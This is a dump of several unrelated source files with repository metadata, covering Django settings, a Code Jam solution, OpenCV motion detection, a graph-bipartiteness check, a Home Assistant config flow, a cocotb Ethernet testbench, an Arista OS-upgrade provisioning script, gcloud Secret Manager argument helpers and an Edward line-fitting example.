'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
CRISPY_TEMPLATE_PACK='bootstrap4'
LOGIN_REDIRECT_URL='user-home' | [
"viralsir2018@gmail.com"
] | viralsir2018@gmail.com |
80fe5968b58c6bc39a226d89c6a53f4b943bec80 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_117/1697.py | 2d533ed7e58f2a6b946b3996a912c5ea1547f56b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | #!/usr/bin/python
"""
lawnmower.py
google code jam
Date: April 13, 2013
"""
# Imports
import sys, os
__version__ = "0.0"
__copyright__ = "CopyRight (C) 2012-13 by Coding Assassin"
__license__ = "MIT"
__author__ = "Coding Assassin"
__author_email__ = "Coding Assassin, codingassassin@gmail.com"
USAGE = "%prog [options]"
VERSION = "%prog v" + __version__
AGENT = "%s/%s" % (__name__, __version__)
def main():
# Open files
w = open("output.txt", 'w')
f = open("workfile.txt", 'r')
T = int(f.readline())
for i in range(T):
buff = f.readline().split()
N = int(buff[0])
M = int(buff[1])
# Load into arr
arr = []
for n in range(N):
arr.append(f.readline().rstrip().split())
for a in arr:
print a
# check for maximum in row and column
possible = True
for n in range(N):
for m in range(M):
rowPos = True
colPos = True
# check for max in row
if max(arr[n]) > arr[n][m]:
rowPos = False
# check for max in column
for x in range(N):
if arr[x][m] > arr[n][m]:
colPos = False
break
if rowPos == False and colPos == False:
possible = False
break
if possible == False:
break
if possible == False:
w.write("Case #"+str(i+1)+": NO\n")
print "Case #"+str(i+1)+": NO"
else:
w.write("Case #"+str(i+1)+": YES\n")
print "Case #"+str(i+1)+": YES"
if __name__ == '__main__':
main()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
4fac6b7a9628197b6fe387f186a7fc07623e4ca6 | 14b5679d88afa782dc5d6b35878ab043089a060a | /students/20171587wangyubin/house_class/vcap1.py | f0ffe88f3375d9602fec4d65ea1638ee0c2c9ff9 | [] | no_license | mutiangua/EIS2020 | c541ef32623f67f9277945cd39cff3c02f06e4dd | 92aa2711b763a2c93be238825c445bf2db8da391 | refs/heads/master | 2022-11-18T05:21:47.567342 | 2020-07-11T10:11:21 | 2020-07-11T10:11:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,737 | py | import cv2
import numpy as np
import os
import time
def movedetect():
cap = cv2.VideoCapture(0)
background = None
temp = 0
while True:
# 读取视频流
ret, frame= cap.read()
gray_lwpCV = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# 将第一帧设置为整个输入的背景
if background is None:
background = gray_lwpCV
continue
# 对于每个从背景之后读取的帧都会计算其与背景之间的差异,并得到一个差分图(different map)。
diff = cv2.absdiff(background, gray_lwpCV)
diff = cv2.threshold(diff, 100, 255, cv2.THRESH_BINARY)[1] # 二值化阈值处理
# 显示矩形框
contours, hierarchy = cv2.findContours(diff.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) # 该函数计算一幅图像中目标的轮廓
count = 0
for c in contours:
if cv2.contourArea(c) < 2000: # 对于矩形区域,只显示大于给定阈值的轮廓,所以一些微小的变化不会显示。对于光照不变和噪声低的摄像头可不设定轮廓最小尺寸的阈值
continue
(x, y, w, h) = cv2.boundingRect(c) # 该函数计算矩形的边界框
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
count += 1
if temp != 0:
if count > temp : # 方框变多视为运动物体进入
os.system("test.wav")
time.sleep(6)
temp = count
cv2.imshow('contours', frame)
cv2.imshow('dis', diff)
key = cv2.waitKey(1) & 0xFF
# 按'q'健退出循环
if key == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
# When everything done, release the capture
while True:
movedetect() | [
"noreply@github.com"
] | mutiangua.noreply@github.com |
02e26a493efe213d0a3b77f60ce46f37ef39a36e | 4910c0f3d03935fc8ee03f1e9dc20dfdb2c7c04b | /Codigos estudiantes por lenguaje/PY/Bryann Valderrama/Grafos/BipartiteGraph.py | d04bb54e45d392f35ce30a386bc046a34184b7b6 | [] | no_license | roca12/gpccodes | ab15eeedc0cadc0735651262887b44f1c2e65b93 | aa034a3014c6fb879ec5392c51f9714bdc5b50c2 | refs/heads/master | 2023-02-01T13:49:27.563662 | 2023-01-19T22:50:58 | 2023-01-19T22:50:58 | 270,723,328 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | V = 4
def isBipartite(G, src):
colorArr = [-1 for x in range(V)]
colorArr[src] = 1
q = []
q.append(src)
while not len(q) == 0:
u = q.pop()
if (G[u][u] == 1):
return False
for v in range(V):
if (G[u][u] == 1 and colorArr[v] == 1):
colorArr[v] = 1 - colorArr[u]
q.append(v)
elif (G[u][v] == 1 and colorArr[v] == colorArr[u]):
return False
return True
if __name__ == '__main__':
G = [[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]]
if (isBipartite(G, 0)):
print('Es bipartito')
else:
print('No es Bipartito')
| [
"noreply@github.com"
] | roca12.noreply@github.com |
5285bc090689cadec3f1c61678c4e661e70d5554 | c9094a4ed256260bc026514a00f93f0b09a5d60c | /homeassistant/components/ovo_energy/config_flow.py | 0b2f7aac2d0dd332aa5b63b9f04288dab3f820d5 | [
"Apache-2.0"
] | permissive | turbokongen/home-assistant | 824bc4704906ec0057f3ebd6d92788e096431f56 | 4ab0151fb1cbefb31def23ba850e197da0a5027f | refs/heads/dev | 2023-03-12T05:49:44.508713 | 2021-02-17T14:06:16 | 2021-02-17T14:06:16 | 50,231,140 | 4 | 1 | Apache-2.0 | 2023-02-22T06:14:30 | 2016-01-23T08:55:09 | Python | UTF-8 | Python | false | false | 3,440 | py | """Config flow to configure the OVO Energy integration."""
import aiohttp
from ovoenergy.ovoenergy import OVOEnergy
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.config_entries import ConfigFlow
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from .const import DOMAIN # pylint: disable=unused-import
REAUTH_SCHEMA = vol.Schema({vol.Required(CONF_PASSWORD): str})
USER_SCHEMA = vol.Schema(
{vol.Required(CONF_USERNAME): str, vol.Required(CONF_PASSWORD): str}
)
class OVOEnergyFlowHandler(ConfigFlow, domain=DOMAIN):
"""Handle a OVO Energy config flow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_CLOUD_POLL
def __init__(self):
"""Initialize the flow."""
self.username = None
async def async_step_user(self, user_input=None):
"""Handle a flow initiated by the user."""
errors = {}
if user_input is not None:
client = OVOEnergy()
try:
authenticated = await client.authenticate(
user_input[CONF_USERNAME], user_input[CONF_PASSWORD]
)
except aiohttp.ClientError:
errors["base"] = "cannot_connect"
else:
if authenticated:
await self.async_set_unique_id(user_input[CONF_USERNAME])
self._abort_if_unique_id_configured()
return self.async_create_entry(
title=client.username,
data={
CONF_USERNAME: user_input[CONF_USERNAME],
CONF_PASSWORD: user_input[CONF_PASSWORD],
},
)
errors["base"] = "invalid_auth"
return self.async_show_form(
step_id="user", data_schema=USER_SCHEMA, errors=errors
)
async def async_step_reauth(self, user_input):
"""Handle configuration by re-auth."""
errors = {}
if user_input and user_input.get(CONF_USERNAME):
self.username = user_input[CONF_USERNAME]
self.context["title_placeholders"] = {CONF_USERNAME: self.username}
if user_input is not None and user_input.get(CONF_PASSWORD) is not None:
client = OVOEnergy()
try:
authenticated = await client.authenticate(
self.username, user_input[CONF_PASSWORD]
)
except aiohttp.ClientError:
errors["base"] = "connection_error"
else:
if authenticated:
await self.async_set_unique_id(self.username)
for entry in self._async_current_entries():
if entry.unique_id == self.unique_id:
self.hass.config_entries.async_update_entry(
entry,
data={
CONF_USERNAME: self.username,
CONF_PASSWORD: user_input[CONF_PASSWORD],
},
)
return self.async_abort(reason="reauth_successful")
errors["base"] = "authorization_error"
return self.async_show_form(
step_id="reauth", data_schema=REAUTH_SCHEMA, errors=errors
)
| [
"noreply@github.com"
] | turbokongen.noreply@github.com |
d4b37b4be69c7bd3ef9bfd185f240b150b6a97cd | 9c268aa04ab8b359d11399f94a30c8f4fe171a0c | /tb/eth_mac_1g_gmii_fifo/test_eth_mac_1g_gmii_fifo.py | 1879de7188d98184a75f8464c03b1ceacfb43b1f | [
"MIT"
] | permissive | alexforencich/verilog-ethernet | e41586b9214e66341f3eace03da2baa9c004da89 | b316c6764e083823f95f52b3f324fccee4f12fa0 | refs/heads/master | 2023-09-03T00:58:09.380285 | 2023-08-26T19:44:50 | 2023-08-26T19:44:50 | 26,883,874 | 1,690 | 530 | MIT | 2023-08-25T05:59:58 | 2014-11-19T22:04:53 | Verilog | UTF-8 | Python | false | false | 7,694 | py | #!/usr/bin/env python
"""
Copyright (c) 2020 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import itertools
import logging
import os
import cocotb_test.simulator
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge
from cocotb.regression import TestFactory
from cocotbext.eth import GmiiFrame, GmiiPhy
from cocotbext.axi import AxiStreamBus, AxiStreamSource, AxiStreamSink
class TB:
def __init__(self, dut, speed=1000e6):
self.dut = dut
self.log = logging.getLogger("cocotb.tb")
self.log.setLevel(logging.DEBUG)
cocotb.start_soon(Clock(dut.gtx_clk, 8, units="ns").start())
cocotb.start_soon(Clock(dut.logic_clk, 8, units="ns").start())
self.gmii_phy = GmiiPhy(dut.gmii_txd, dut.gmii_tx_er, dut.gmii_tx_en, dut.mii_tx_clk, dut.gmii_tx_clk,
dut.gmii_rxd, dut.gmii_rx_er, dut.gmii_rx_dv, dut.gmii_rx_clk, speed=speed)
self.axis_source = AxiStreamSource(AxiStreamBus.from_prefix(dut, "tx_axis"), dut.logic_clk, dut.logic_rst)
self.axis_sink = AxiStreamSink(AxiStreamBus.from_prefix(dut, "rx_axis"), dut.logic_clk, dut.logic_rst)
dut.cfg_ifg.setimmediatevalue(0)
dut.cfg_tx_enable.setimmediatevalue(0)
dut.cfg_rx_enable.setimmediatevalue(0)
async def reset(self):
self.dut.gtx_rst.setimmediatevalue(0)
self.dut.logic_rst.setimmediatevalue(0)
await RisingEdge(self.dut.tx_clk)
await RisingEdge(self.dut.tx_clk)
self.dut.gtx_rst.value = 1
self.dut.logic_rst.value = 1
await RisingEdge(self.dut.tx_clk)
await RisingEdge(self.dut.tx_clk)
self.dut.gtx_rst.value = 0
self.dut.logic_rst.value = 0
await RisingEdge(self.dut.tx_clk)
await RisingEdge(self.dut.tx_clk)
def set_speed(self, speed):
pass
async def run_test_rx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6):
tb = TB(dut, speed)
tb.gmii_phy.rx.ifg = ifg
tb.dut.cfg_ifg.value = ifg
tb.dut.cfg_rx_enable.value = 1
tb.set_speed(speed)
await tb.reset()
for k in range(100):
await RisingEdge(dut.rx_clk)
if speed == 10e6:
assert dut.speed == 0
elif speed == 100e6:
assert dut.speed == 1
else:
assert dut.speed == 2
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
test_frame = GmiiFrame.from_payload(test_data)
await tb.gmii_phy.rx.send(test_frame)
for test_data in test_frames:
rx_frame = await tb.axis_sink.recv()
assert rx_frame.tdata == test_data
assert rx_frame.tuser == 0
assert tb.axis_sink.empty()
await RisingEdge(dut.rx_clk)
await RisingEdge(dut.rx_clk)
async def run_test_tx(dut, payload_lengths=None, payload_data=None, ifg=12, speed=1000e6):
tb = TB(dut, speed)
tb.gmii_phy.rx.ifg = ifg
tb.dut.cfg_ifg.value = ifg
tb.dut.cfg_tx_enable.value = 1
tb.set_speed(speed)
await tb.reset()
for k in range(100):
await RisingEdge(dut.rx_clk)
if speed == 10e6:
assert dut.speed == 0
elif speed == 100e6:
assert dut.speed == 1
else:
assert dut.speed == 2
test_frames = [payload_data(x) for x in payload_lengths()]
for test_data in test_frames:
await tb.axis_source.send(test_data)
for test_data in test_frames:
rx_frame = await tb.gmii_phy.tx.recv()
assert rx_frame.get_payload() == test_data
assert rx_frame.check_fcs()
assert rx_frame.error is None
assert tb.gmii_phy.tx.empty()
await RisingEdge(dut.tx_clk)
await RisingEdge(dut.tx_clk)
def size_list():
return list(range(60, 128)) + [512, 1514] + [60]*10
def incrementing_payload(length):
return bytearray(itertools.islice(itertools.cycle(range(256)), length))
def cycle_en():
return itertools.cycle([0, 0, 0, 1])
if cocotb.SIM_NAME:
for test in [run_test_rx, run_test_tx]:
factory = TestFactory(test)
factory.add_option("payload_lengths", [size_list])
factory.add_option("payload_data", [incrementing_payload])
factory.add_option("ifg", [12])
factory.add_option("speed", [1000e6, 100e6, 10e6])
factory.generate_tests()
# cocotb-test
tests_dir = os.path.abspath(os.path.dirname(__file__))
rtl_dir = os.path.abspath(os.path.join(tests_dir, '..', '..', 'rtl'))
lib_dir = os.path.abspath(os.path.join(rtl_dir, '..', 'lib'))
axis_rtl_dir = os.path.abspath(os.path.join(lib_dir, 'axis', 'rtl'))
def test_eth_mac_1g_gmii_fifo(request):
dut = "eth_mac_1g_gmii_fifo"
module = os.path.splitext(os.path.basename(__file__))[0]
toplevel = dut
verilog_sources = [
os.path.join(rtl_dir, f"{dut}.v"),
os.path.join(rtl_dir, "eth_mac_1g_gmii.v"),
os.path.join(rtl_dir, "gmii_phy_if.v"),
os.path.join(rtl_dir, "ssio_sdr_in.v"),
os.path.join(rtl_dir, "ssio_sdr_out.v"),
os.path.join(rtl_dir, "oddr.v"),
os.path.join(rtl_dir, "eth_mac_1g.v"),
os.path.join(rtl_dir, "axis_gmii_rx.v"),
os.path.join(rtl_dir, "axis_gmii_tx.v"),
os.path.join(rtl_dir, "lfsr.v"),
os.path.join(axis_rtl_dir, "axis_adapter.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo.v"),
os.path.join(axis_rtl_dir, "axis_async_fifo_adapter.v"),
]
parameters = {}
parameters['AXIS_DATA_WIDTH'] = 8
parameters['AXIS_KEEP_ENABLE'] = int(parameters['AXIS_DATA_WIDTH'] > 8)
parameters['AXIS_KEEP_WIDTH'] = parameters['AXIS_DATA_WIDTH'] // 8
parameters['ENABLE_PADDING'] = 1
parameters['MIN_FRAME_LENGTH'] = 64
parameters['TX_FIFO_DEPTH'] = 16384
parameters['TX_FRAME_FIFO'] = 1
parameters['TX_DROP_OVERSIZE_FRAME'] = parameters['TX_FRAME_FIFO']
parameters['TX_DROP_BAD_FRAME'] = parameters['TX_DROP_OVERSIZE_FRAME']
parameters['TX_DROP_WHEN_FULL'] = 0
parameters['RX_FIFO_DEPTH'] = 16384
parameters['RX_FRAME_FIFO'] = 1
parameters['RX_DROP_OVERSIZE_FRAME'] = parameters['RX_FRAME_FIFO']
parameters['RX_DROP_BAD_FRAME'] = parameters['RX_DROP_OVERSIZE_FRAME']
parameters['RX_DROP_WHEN_FULL'] = parameters['RX_DROP_OVERSIZE_FRAME']
extra_env = {f'PARAM_{k}': str(v) for k, v in parameters.items()}
sim_build = os.path.join(tests_dir, "sim_build",
request.node.name.replace('[', '-').replace(']', ''))
cocotb_test.simulator.run(
python_search=[tests_dir],
verilog_sources=verilog_sources,
toplevel=toplevel,
module=module,
parameters=parameters,
sim_build=sim_build,
extra_env=extra_env,
)
| [
"alex@alexforencich.com"
] | alex@alexforencich.com |
ad0716b036a955c295028b8c16f49890ea6ae1bb | e96ffb6103e1e9396c19312710d523f1bada0595 | /system_program/upgrade_os.py | 78e448d3cb8af6635b75b0c09b0821bd5cfe2530 | [] | no_license | ktsdn/switch_application | 9e1e6558aa295b8bd7512d06d24fdeb2cf15d50a | 9e6b6f1186ef48320a5f21cc8a908fbfede54aba | refs/heads/master | 2016-09-06T19:48:42.092557 | 2014-06-16T17:45:43 | 2014-06-16T17:45:43 | 19,848,643 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,851 | py | #!/usr/bin/python
import os, re, subprocess, sys, urllib, string, Tac, EntityManager
sys.stdout
if len(sys.argv) != 2:
print sys.argv[0]+" requres [os image name]"
sys.exit()
osimage_name=sys.argv[1]
configUrl = "http://20.0.2.224/os/%s"
parsedUrl = configUrl % ( osimage_name )
# Look at the boot-config file and get the currently set EOS version
fd = open("/etc/swi-version", "r")
for item in fd:
if "SWI_VERSION=" in item:
swiversion = item.strip('SWI_VERSION=|\n')
fd.close()
#This allows output to the console during boot time
def printLog( logmsg ):
    """Echo logmsg to stdout and forward it to syslog (local4.crit, tag ZeroTouch).

    NOTE(review): logmsg is interpolated unquoted into a shell command, so
    shell metacharacters in the message would be interpreted by /bin/sh.
    """
    print logmsg
    os.system( '/usr/bin/logger -p local4.crit -t ZeroTouch %s' % logmsg )
ret = urllib.urlopen(parsedUrl)

updateBootConfig = False
# Reject tiny responses: a real SWI image is far larger than 2 KB, so a
# short body is most likely an error/permission page from the server.
if int(ret.info()['content-length']) < 2048:
    printLog('there is no os images or permission to download')
    sys.exit()
else:
    if ret.info()['content-type'] == 'application/vnd.aristanetworks.swi':
        # Skip the download when the image is already present on flash.
        if not os.path.isfile('/mnt/flash/%s' % osimage_name):
            download = True
        else:
            download = False
            updateBootConfig = True
            printLog(osimage_name+' already existed in /mnt/flash')
        # download processing
        if download == True:
            swiSize = ret.info()['content-length']
            urllib.urlretrieve(parsedUrl, '/mnt/flash/%s' % osimage_name)
            printLog('download url = %s' % parsedUrl)
            localFileSize = str(os.stat('/mnt/flash/%s' % osimage_name).st_size)
            # Verify the download by comparing the advertised and on-disk sizes.
            if swiSize == localFileSize:
                printLog ('Downloaded %s' % osimage_name)
                updateBootConfig = True
            else:
                printLog ('Download failed, exiting')
                updateBootConfig = False
    else:
        printLog('this image is not os image, content-type is wrong')
        sys.exit()
ret.close()

# Change the boot-config file to new version
if updateBootConfig:
    fd = open("/mnt/flash/boot-config", "w")
    fd.write("SWI=flash:%s\n\n" % osimage_name)
    fd.close()
sys.exit()
| [
"root@localhost.localdomain"
] | root@localhost.localdomain |
d5b7faf942dad1ccd22553726dc85d68233b94b4 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/11166141.py | 278d2a652da2694d5480708b494ecc58d53edac3 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11166141.py generated: Wed, 25 Jan 2017 15:25:27
#
# Event Type: 11166141
#
# ASCII decay Descriptor: [B0 -> (D*(2010)- -> (D~0 -> (KS0 -> pi+ pi-) pi+ pi-) pi-) pi+]cc
#
# Gauss generator configuration for event type 11166141 (machine generated;
# keep tool names and PID list in sync with the decay descriptor above).
from Configurables import Generation
Generation().EventType = 11166141
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
# EvtGen user decay file defining the signal decay chain.
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_Dst-pi,KSpipi=DecProdCut.dec"
# Generator-level acceptance cut and signal PIDs (B0 / anti-B0).
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
| [
"slavomirastefkova@b2pcx39016.desy.de"
] | slavomirastefkova@b2pcx39016.desy.de |
0f62e49af163ce60e641517c8e094dc79f51ed77 | d842a95213e48e30139b9a8227fb7e757f834784 | /gcloud/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/command_lib/secrets/args.py | 8263c671f43b9e8f6e2e916e137e2d0b4170bf43 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"MIT"
] | permissive | bopopescu/JobSniperRails | f37a15edb89f54916cc272884b36dcd83cdc868a | 39e7f871887176770de0f4fc6789e9ddc7f32b1f | refs/heads/master | 2022-11-22T18:12:37.972441 | 2019-09-20T22:43:14 | 2019-09-20T22:43:14 | 282,293,504 | 0 | 0 | MIT | 2020-07-24T18:47:35 | 2020-07-24T18:47:34 | null | UTF-8 | Python | false | false | 6,385 | py | # -*- coding: utf-8 -*- #
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Shared resource arguments and flags."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope.concepts import concepts
from googlecloudsdk.command_lib.util.concepts import concept_parsers
from googlecloudsdk.core import resources
# Args
def AddCreateIfMissing(parser, resource, positional=False, **kwargs):
  """Adds a create-if-missing boolean flag (or positional) for *resource*."""
  help_text = ('Create the {resource} if it does not exist. If this flag is not '
               'set, the command will return an error when attempting to update a '
               '{resource} that does not exist.').format(resource=resource)
  parser.add_argument(
      _ArgOrFlag('create-if-missing', positional),
      action='store_true',
      help=help_text,
      **kwargs)
def AddDataFile(parser, positional=False, **kwargs):
  """Adds the data-file argument (path to secret data, '-' for stdin)."""
  help_text = ('File path from which to read secret data. Set this to "-" to read '
               'the secret data from stdin.')
  parser.add_argument(
      _ArgOrFlag('data-file', positional),
      metavar='PATH',
      help=help_text,
      **kwargs)
def AddProject(parser, positional=False, **kwargs):
  """Adds a project resource argument to the parser."""
  project_arg = concept_parsers.ConceptParser.ForResource(
      name=_ArgOrFlag('project', positional),
      resource_spec=GetProjectResourceSpec(),
      group_help='The project ID.',
      **kwargs)
  project_arg.AddToParser(parser)
def AddLocation(parser, purpose, positional=False, **kwargs):
  """Adds a location resource argument; *purpose* completes the help text."""
  location_arg = concept_parsers.ConceptParser.ForResource(
      name=_ArgOrFlag('location', positional),
      resource_spec=GetLocationResourceSpec(),
      group_help='The location {}.'.format(purpose),
      **kwargs)
  location_arg.AddToParser(parser)
# TODO(b/135570696): may want to convert to resource arg & add fallthrough
def AddLocations(parser, resource, positional=False, **kwargs):
  """Adds a repeated locations argument (comma-separated list)."""
  help_text = ('Comma-separated list of locations in which the {resource} should '
               'be replicated.').format(resource=resource)
  parser.add_argument(
      _ArgOrFlag('locations', positional),
      action=arg_parsers.UpdateAction,
      metavar='LOCATION',
      type=arg_parsers.ArgList(),
      help=help_text,
      **kwargs)
def AddSecret(parser, purpose, positional=False, **kwargs):
  """Adds a secret resource argument; *purpose* completes the help text."""
  secret_arg = concept_parsers.ConceptParser.ForResource(
      name=_ArgOrFlag('secret', positional),
      resource_spec=GetSecretResourceSpec(),
      group_help='The secret {}.'.format(purpose),
      **kwargs)
  secret_arg.AddToParser(parser)
def AddVersion(parser, purpose, positional=False, **kwargs):
  """Adds a numeric secret-version resource argument."""
  version_arg = concept_parsers.ConceptParser.ForResource(
      name=_ArgOrFlag('version', positional),
      resource_spec=GetVersionResourceSpec(),
      group_help='Numeric secret version {}.'.format(purpose),
      **kwargs)
  version_arg.AddToParser(parser)
def _ArgOrFlag(name, positional):
  """Formats *name* as a positional argument or as a flag.

  Args:
    name (str): name of the argument
    positional (bool): whether the argument is positional

  Returns:
    str: the upper-cased, underscore-separated positional form, or the
      '--'-prefixed flag form
  """
  if not positional:
    return '--{}'.format(name)
  return name.replace('-', '_').upper()
### Attribute configurations
def GetProjectAttributeConfig():
  """Returns the default attribute config for the project parameter."""
  return concepts.DEFAULT_PROJECT_ATTRIBUTE_CONFIG
def GetLocationAttributeConfig():
  """Returns the attribute config for the location resource parameter."""
  return concepts.ResourceParameterAttributeConfig(
      name='location',
      help_text='The location of the {resource}.',
      completion_request_params={'fieldMask': 'name'},
      completion_id_field='name')
def GetSecretAttributeConfig():
  """Returns the attribute config for the secret resource parameter."""
  return concepts.ResourceParameterAttributeConfig(
      name='secret',
      help_text='The secret of the {resource}.',
      completion_request_params={'fieldMask': 'name'},
      completion_id_field='name')
def GetVersionAttributeConfig():
  """Returns the attribute config for the version resource parameter."""
  return concepts.ResourceParameterAttributeConfig(
      name='version',
      help_text='The version of the {resource}.',
      completion_request_params={'fieldMask': 'name'},
      completion_id_field='name')
# Resource specs
def GetProjectResourceSpec():
  """Returns the resource spec for a Secret Manager project."""
  return concepts.ResourceSpec(
      resource_collection='secretmanager.projects',
      resource_name='project',
      plural_name='projects',
      disable_auto_completers=False,
      projectsId=GetProjectAttributeConfig())
def GetLocationResourceSpec():
  """Returns the resource spec for a Secret Manager location."""
  return concepts.ResourceSpec(
      resource_collection='secretmanager.projects.locations',
      resource_name='location',
      plural_name='locations',
      disable_auto_completers=False,
      locationsId=GetLocationAttributeConfig(),
      projectsId=GetProjectAttributeConfig())
def GetSecretResourceSpec():
  """Returns the resource spec for a Secret Manager secret."""
  return concepts.ResourceSpec(
      resource_collection='secretmanager.projects.secrets',
      resource_name='secret',
      plural_name='secrets',
      disable_auto_completers=False,
      secretsId=GetSecretAttributeConfig(),
      projectsId=GetProjectAttributeConfig())
def GetVersionResourceSpec():
  """Returns the resource spec for a Secret Manager secret version."""
  return concepts.ResourceSpec(
      'secretmanager.projects.secrets.versions',
      resource_name='version',
      plural_name='version',
      disable_auto_completers=False,
      versionsId=GetVersionAttributeConfig(),
      secretsId=GetSecretAttributeConfig(),
      projectsId=GetProjectAttributeConfig())
# Resource parsers
def ParseProjectRef(ref, **kwargs):
  """Parses *ref* as a secretmanager.projects resource reference."""
  kwargs.update(collection='secretmanager.projects')
  return resources.REGISTRY.Parse(ref, **kwargs)
def ParseLocationRef(ref, **kwargs):
  """Parses *ref* as a secretmanager.projects.locations resource reference."""
  kwargs.update(collection='secretmanager.projects.locations')
  return resources.REGISTRY.Parse(ref, **kwargs)
def ParseSecretRef(ref, **kwargs):
  """Parses *ref* as a secretmanager.projects.secrets resource reference."""
  kwargs.update(collection='secretmanager.projects.secrets')
  return resources.REGISTRY.Parse(ref, **kwargs)
def ParseVersionRef(ref, **kwargs):
  """Parses *ref* as a secretmanager.projects.secrets.versions reference."""
  kwargs.update(collection='secretmanager.projects.secrets.versions')
  return resources.REGISTRY.Parse(ref, **kwargs)
| [
"luizfper@gmail.com"
] | luizfper@gmail.com |
d38e23d4fe46dcbd8af662da3ec32e0ddd091617 | e5ea52ee45b1938fdafee1b43e472cc7d7fbaed7 | /content/downloads/code/test_edward.py | 67cddc71179cfee70a615cc8fe0ed4facb909578 | [
"MIT"
] | permissive | mattpitkin/samplers-demo | fabe2735ba80706fc8688e462797cb1919e03109 | b511f891a30fb46c215c065ceb7e618c820d4d03 | refs/heads/master | 2022-07-31T05:33:59.252825 | 2022-07-18T12:16:06 | 2022-07-18T12:16:06 | 119,070,470 | 8 | 1 | MIT | 2021-05-20T09:47:35 | 2018-01-26T15:47:25 | Jupyter Notebook | UTF-8 | Python | false | false | 1,759 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Example of running edward to fit the parameters of a straight line.
"""
from __future__ import print_function, division
import os
import sys
import numpy as np
import matplotlib as mpl
mpl.use("Agg") # force Matplotlib backend to Agg
# import edward and TensorFlow
import edward as ed
import tensorflow as tf
from edward.models import Normal, Uniform, Empirical
# import model and data
from createdata import *
# set the priors
cmin = -10. # lower range of uniform distribution on c
cmax = 10. # upper range of uniform distribution on c
cp = Uniform(low=cmin, high=cmax)

mmu = 0. # mean of Gaussian distribution on m
msigma = 10. # standard deviation of Gaussian distribution on m
mp = Normal(loc=mmu, scale=msigma)
